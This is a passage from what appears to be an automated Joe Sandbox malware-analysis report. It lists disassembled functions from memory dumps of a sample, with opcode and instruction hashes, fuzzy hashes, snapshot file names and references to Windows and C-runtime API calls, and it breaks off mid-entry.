                                                                                                                                      Function 0642D016 Relevance: .1, Instructions: 100COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3688121783.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6420000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 96450d325ffd8d91d90b29ed88628aef8af293425fa2d1826e93eb5d7c83f06f
                                                                                                                                      • Instruction ID: 2ae3f39a1dc756558ac6dd2f5951ea9f41ad74ca035c44e274f553c34805742e
                                                                                                                                      • Opcode Fuzzy Hash: 96450d325ffd8d91d90b29ed88628aef8af293425fa2d1826e93eb5d7c83f06f
                                                                                                                                      • Instruction Fuzzy Hash: A541F574E002188BDB58DFAAD8543EDBBF2BF89304F60C06AC058BB255DB345942CF44
                                                                                                                                      Function 06459438 Relevance: .1, Instructions: 99COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3688801407.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6450000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: b3e4719d9b3a1815aa8e73cdf2a61c05a3fd4b5f0e3d14e3c99a2a2af6b50fe3
                                                                                                                                      • Instruction ID: 42bca874f99e8e60c47f50ecdf57923de89c678cc5f5f24954f75fb792381698
                                                                                                                                      • Opcode Fuzzy Hash: b3e4719d9b3a1815aa8e73cdf2a61c05a3fd4b5f0e3d14e3c99a2a2af6b50fe3
                                                                                                                                      • Instruction Fuzzy Hash: 9231F5B4D01258DBDB48DFAAD8406DEBBB2BF89300F14D12AD829BB255DB344902CF50
                                                                                                                                      Function 06450E88 Relevance: .1, Instructions: 99COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3688801407.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6450000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 59b6c836fa5e7d8eed12cb63413eedc0a53410c6902e47597f090f708c41c01f
                                                                                                                                      • Instruction ID: 4711cbdc9aa8f847594f8e498f7e4de71cac0b3b7f64fc21ac94740ec0214154
                                                                                                                                      • Opcode Fuzzy Hash: 59b6c836fa5e7d8eed12cb63413eedc0a53410c6902e47597f090f708c41c01f
                                                                                                                                      • Instruction Fuzzy Hash: EE41E4B5E00218CBEB58DFAAD8547ADBBF2BF89304F14D06AC419BB255EB345942CF44
                                                                                                                                      Function 0642A508 Relevance: .1, Instructions: 99COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3688121783.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6420000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 77c52710b805bcd3c8ede2a0f92ce817d5cedb8c679723de37a7cb4e664b68ec
                                                                                                                                      • Instruction ID: 659ca0dc10130336b9ef47f931b94c4780f6ea63a5ce0368972849a544aaf0fc
                                                                                                                                      • Opcode Fuzzy Hash: 77c52710b805bcd3c8ede2a0f92ce817d5cedb8c679723de37a7cb4e664b68ec
                                                                                                                                      • Instruction Fuzzy Hash: 7341E4B4E002188BEB58DFAAD85439EBBF2BF88304F60D06AC458BB254DB344946CF44
                                                                                                                                      Function 0642DE75 Relevance: .1, Instructions: 96COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3688121783.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6420000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 8b3dd2ed236166770b82b1e2fc4a1faefdd55fb05eb7e629bfe086fd3db1211c
                                                                                                                                      • Instruction ID: 73ea8eacefd15c7f1420fdb2e0c5e0b8d8fad0314dc20be5f67fb2adb09bf07a
                                                                                                                                      • Opcode Fuzzy Hash: 8b3dd2ed236166770b82b1e2fc4a1faefdd55fb05eb7e629bfe086fd3db1211c
                                                                                                                                      • Instruction Fuzzy Hash: F041D3B4E002188BDB58DFAAD8547DEBBF2BF88300F64C06AC419BB254DB344942CF54
                                                                                                                                      Function 06453A70 Relevance: .1, Instructions: 95COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3688801407.0000000006450000.00000040.00000800.00020000.00000000.sdmp, Offset: 06450000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6450000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 261dec971dbe1607046275bd62b0cbdda10a8a06abe7a791a47c74cd184f051c
                                                                                                                                      • Instruction ID: bc7eb60917ff91c52d8eb4a8deb5eafdb2b726054cc677f8db94465cd04bdc18
                                                                                                                                      • Opcode Fuzzy Hash: 261dec971dbe1607046275bd62b0cbdda10a8a06abe7a791a47c74cd184f051c
                                                                                                                                      • Instruction Fuzzy Hash: 3131E475E002088BDB59DFAAD9416EEBBF2AF89300F64D02AC819B7355EB345942CF54
                                                                                                                                      Function 06422067 Relevance: .1, Instructions: 95COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3688121783.0000000006420000.00000040.00000800.00020000.00000000.sdmp, Offset: 06420000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6420000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 06900699e1ac94eae56c6894e6f4a2220477b4f7fe3bd1ea9fa8fe28ea460d9d
                                                                                                                                      • Instruction ID: b4d043f3547377832be07ecbfaa5af0624c99d21cfd05ffc48028f4087e97cf4
                                                                                                                                      • Opcode Fuzzy Hash: 06900699e1ac94eae56c6894e6f4a2220477b4f7fe3bd1ea9fa8fe28ea460d9d
                                                                                                                                      • Instruction Fuzzy Hash: 8241E574D012188BEB58DFAAC9546AEBBF2AF89300F60D02AC415BB359DB344A46CF44
                                                                                                                                      Function 00402F89 Relevance: .1, Instructions: 77COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3678323240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3678208117.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678437532.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678630985.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 9961543af999a1320c5b9d9b8c59a9b64f893fc8dbb42675723320a25693eab2
                                                                                                                                      • Instruction ID: 40597224e526abc728bb10992f322fa75c91b34d76fbbe6bc80328d1c420bfc2
                                                                                                                                      • Opcode Fuzzy Hash: 9961543af999a1320c5b9d9b8c59a9b64f893fc8dbb42675723320a25693eab2
                                                                                                                                      • Instruction Fuzzy Hash: F321923170520247EB68C929C9547ABB3A5ABC0389F48853EC986A73C8DAB9E941D785
                                                                                                                                      Function 00417081 Relevance: 31.8, APIs: 21, Instructions: 340COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                                                                                      • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,02181948), ref: 004170C5
                                                                                                                                      • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                                                                                      • _malloc.LIBCMT ref: 0041718A
                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                                                                                      • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                                                                                      • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                                                                                      • _malloc.LIBCMT ref: 0041724C
                                                                                                                                      • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                                                                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                                                                                      • __freea.LIBCMT ref: 004172A4
                                                                                                                                      • __freea.LIBCMT ref: 004172AD
                                                                                                                                      • ___ansicp.LIBCMT ref: 004172DE
                                                                                                                                      • ___convertcp.LIBCMT ref: 00417309
                                                                                                                                      • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                                                                                      • _malloc.LIBCMT ref: 00417362
                                                                                                                                      • _memset.LIBCMT ref: 00417384
                                                                                                                                      • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                                                                                      • ___convertcp.LIBCMT ref: 004173BA
                                                                                                                                      • __freea.LIBCMT ref: 004173CF
                                                                                                                                      • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3678323240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3678208117.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678437532.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678630985.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3809854901-0
                                                                                                                                      • Opcode ID: 699406c386ffa869d5cdd020c3adf727bae4a7aedc43fc2fcbe963bd6ef1e29e
                                                                                                                                      • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                                                                                      • Opcode Fuzzy Hash: 699406c386ffa869d5cdd020c3adf727bae4a7aedc43fc2fcbe963bd6ef1e29e
                                                                                                                                      • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                                                                                      Function 004057B0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 205COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _malloc.LIBCMT ref: 004057DE
                                                                                                                                        • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                                                        • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                                                        • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                                                                      • _malloc.LIBCMT ref: 00405842
                                                                                                                                      • _malloc.LIBCMT ref: 00405906
                                                                                                                                      • _malloc.LIBCMT ref: 00405930
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3678323240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3678208117.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678437532.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678630985.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _malloc$AllocateHeap
                                                                                                                                      • String ID: 1.2.3
                                                                                                                                      • API String ID: 680241177-2310465506
                                                                                                                                      • Opcode ID: 1371ffb49ce3b8dee1113081a69af0fad64233f45308895947edc3c59a7df708
                                                                                                                                      • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                                                                                      • Opcode Fuzzy Hash: 1371ffb49ce3b8dee1113081a69af0fad64233f45308895947edc3c59a7df708
                                                                                                                                      • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                                                                                      Function 0040BCC2 Relevance: 10.7, APIs: 7, Instructions: 189COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3678323240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3678208117.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678437532.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678630985.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3886058894-0
                                                                                                                                      • Opcode ID: c4afc057559a022db8f819d9985b866907c7fad8716f86744927840939a860f5
                                                                                                                                      • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                                                                                      • Opcode Fuzzy Hash: c4afc057559a022db8f819d9985b866907c7fad8716f86744927840939a860f5
                                                                                                                                      • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                                                                                      Function 0040C73D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __lock_file.LIBCMT ref: 0040C6C8
                                                                                                                                      • __fileno.LIBCMT ref: 0040C6D6
                                                                                                                                      • __fileno.LIBCMT ref: 0040C6E2
                                                                                                                                      • __fileno.LIBCMT ref: 0040C6EE
                                                                                                                                      • __fileno.LIBCMT ref: 0040C6FE
                                                                                                                                        • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
                                                                                                                                        • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3678323240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3678208117.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678437532.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678630985.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
                                                                                                                                      • String ID: 'B
                                                                                                                                      • API String ID: 2805327698-2787509829
                                                                                                                                      • Opcode ID: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                      • Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
                                                                                                                                      • Opcode Fuzzy Hash: 2b0b2601706cdb465d4c9eff24f73974ea9fb0f2dbbf8fc2cbf9e4943b65d960
                                                                                                                                      • Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D
                                                                                                                                      Function 00414738 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 31COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __getptd.LIBCMT ref: 00414744
                                                                                                                                        • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                        • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                      • __getptd.LIBCMT ref: 0041475B
                                                                                                                                      • __amsg_exit.LIBCMT ref: 00414769
                                                                                                                                      • __lock.LIBCMT ref: 00414779
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3678323240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3678208117.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678437532.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678630985.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                                                                      • String ID: @.B
                                                                                                                                      • API String ID: 3521780317-470711618
                                                                                                                                      • Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                      • Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
                                                                                                                                      • Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
                                                                                                                                      • Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D
                                                                                                                                      Function 00413FCC Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • __getptd.LIBCMT ref: 00413FD8
                                                                                                                                        • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
                                                                                                                                        • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
                                                                                                                                      • __amsg_exit.LIBCMT ref: 00413FF8
                                                                                                                                      • __lock.LIBCMT ref: 00414008
                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 00414025
                                                                                                                                      • InterlockedIncrement.KERNEL32(02181690), ref: 00414050
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3678323240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3678208117.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678437532.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678630985.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4271482742-0
                                                                                                                                      • Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                      • Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
                                                                                                                                      • Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
                                                                                                                                      • Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD
                                                                                                                                      Function 0040FA58 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 69COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3678323240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3678208117.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678437532.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678630985.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_173260890731de59c5efad150425b91227bfd141970725ea0b2bb1ec29e5892bd38992.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __calloc_crt
                                                                                                                                      • String ID: P$B$`$B
                                                                                                                                      • API String ID: 3494438863-235554963
                                                                                                                                      • Opcode ID: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
                                                                                                                                      • Instruction ID: 4bdca0f49684ef71ac3198dcc3f656e5d5ce7fed137673697bf40858e87bd1f9
                                                                                                                                      • Opcode Fuzzy Hash: fdf4f6b62053dea64867d0c1085960dee66dbdb5e7cbac4bce55836661d1e8cf
                                                                                                                                      • Instruction Fuzzy Hash: 6011A3327446115BE7348B1DBD50F662391EB84728BA4423BE619EA7E0E77CD8864A4C
                                                                                                                                      Function 00413610 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3678323240.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3678208117.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678437532.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678481845.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3678630985.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
